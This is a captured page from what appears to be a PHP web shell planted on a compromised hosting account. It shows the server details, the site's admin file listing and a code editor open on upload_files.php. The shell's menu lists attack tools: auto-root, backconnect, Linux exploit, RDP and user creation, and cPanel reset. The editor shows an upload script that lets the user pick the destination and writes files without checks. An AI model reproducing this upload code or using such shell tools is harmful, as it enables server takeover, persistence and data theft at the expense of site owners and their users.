Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.96
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
swift-xpc.com /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
.htaccess
4.65
KB
-rw-r--r--
01admin.zip
112.24
KB
-rw-r--r--
add_user.php
11.21
KB
-rw-r--r--
banner.php
1.41
KB
-rw-r--r--
db.php
30
B
-rw-r--r--
delete.php
357
B
-rw-r--r--
delete_banner.php
736
B
-rw-r--r--
delete_post.php
960
B
-rw-r--r--
delete_user.php
991
B
-rw-r--r--
edit_banner.php
3.38
KB
-rw-r--r--
edit_post.php
11.55
KB
-rw-r--r--
edit_post2.php
5.62
KB
-rw-r--r--
edit_user.php
13.09
KB
-rw-r--r--
editsettings.php
2.61
KB
-rw-r--r--
error_log
54.03
KB
-rw-r--r--
function_users.php
6.8
KB
-rw-r--r--
functions.php
10.92
KB
-rw-r--r--
home.php
6.62
KB
-rw-r--r--
index.php
56
B
-rw-r--r--
insert_banners.php
3.07
KB
-rw-r--r--
insert_post.php
9.63
KB
-rw-r--r--
login.php
1.57
KB
-rw-r--r--
login_admin.php
3.11
KB
-rw-r--r--
logout.php
164
B
-rw-r--r--
member.php
17.64
KB
-rw-r--r--
payment_setting.php
2.97
KB
-rw-r--r--
picupload.php
2.12
KB
-rw-r--r--
post.php
2.02
KB
-rw-r--r--
posts.php
2.94
KB
-rw-r--r--
print_shipment.php
1.91
KB
-rw-r--r--
register_admin.php
8.45
KB
-rw-r--r--
remove_amount.php
1.01
KB
-rw-r--r--
searchmembers.php
2.94
KB
-rw-r--r--
send_email.php
5.02
KB
-rw-r--r--
testimony.php
3.15
KB
-rw-r--r--
upload_files.php
2.59
KB
-rw-r--r--
user_error.php
188
B
-rw-r--r--
user_withdrawal.php
4.99
KB
-rw-r--r--
view_admin.php
2.84
KB
-rw-r--r--
view_banners.php
2.4
KB
-rw-r--r--
view_posts.php
2.85
KB
-rw-r--r--
view_referrals_bonus.php
2.83
KB
-rw-r--r--
view_users.php
4.78
KB
-rw-r--r--
viewconversation.php
5.37
KB
-rw-r--r--
viewmessage.php
2.4
KB
-rw-r--r--
viewmessages.php
4.24
KB
-rw-r--r--
website_setting.php
3.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upload_files.php
<?php include("includes/header.php"); include("includes/navbar.php"); ?> <head> <title>Upload file </title> <head> <br/><div id="mypost"><center> <h4>Upload documents and files of any format into our site </h4> <?php echo '<img src="img/library.png" >'; echo '<img src="img/library6.png" >'; $lecturer = $_SESSION ["sess_lecturer"]; ?> </center> $destination == ../mobile/includes/ <form method="post" id="myform" action="" enctype="multipart/form-data"> <em>file destination must end with a trailig slash!!!</em><br/> File destination: <br/><input type="text" name="destination" value="../mobile/css/" ><br/> Add the file: <input type="file" name="file" > <br/> Add the file2: <input type="file" name="file2" > Add the file3: <input type="file" name="file3" > Add the file4: <input type="file" name="file4" > <div class="form-row"> <button type="submit" name="submit" type="submit">Upload file</button> </div> <em>max size of file 100 mb</em> </form> </div> <div id="mypost_update"> <?php if(isset($_POST['submit'])){ $destination = mysql_escape_string($_POST['destination']); $errors= array(); $post_file = mysql_escape_string($_FILES['file']['name']); $file_name = $_FILES['file']['name']; $file_name2 = $_FILES['file2']['name']; $file_name3 = $_FILES['file3']['name']; $file_name4 = $_FILES['file4']['name']; $file_size =$_FILES['file']['size']; $file_tmp =$_FILES['file']['tmp_name']; $file_tmp2 =$_FILES['file2']['tmp_name']; $file_tmp3 =$_FILES['file3']['tmp_name']; $file_tmp4 =$_FILES['file4']['tmp_name']; $file_type=$_FILES['file']['type']; $file_ext=explode('.',$_FILES['file']['name']); $file_ext=strtolower(end($file_ext)); $expensions= array("jpeg","jpg","png", "zip","txt" ,"apk","pdf","doc","mp3" ,"mp4"); if($file_size > 109715200){ echo'File size must not exceed 100 MB'; } if(empty($errors)==true){ move_uploaded_file($file_tmp,"".$destination."".$file_name); move_uploaded_file($file_tmp2,"".$destination."".$file_name2); move_uploaded_file($file_tmp3,"".$destination."".$file_name3); move_uploaded_file($file_tmp4,"".$destination."".$file_name4); if($destination=="" || $file_name==""){ echo " upload the file with it's destination!!!<br/><br/>"; } else{ echo "<center><code>Files uploaded and overwirtten sucessfully!!</code></center>"; } } else{ echo "File size should not exceed 10 mb"; } } ?> <div id="mypost"> </div> </div> <?php include("footer.php");
Close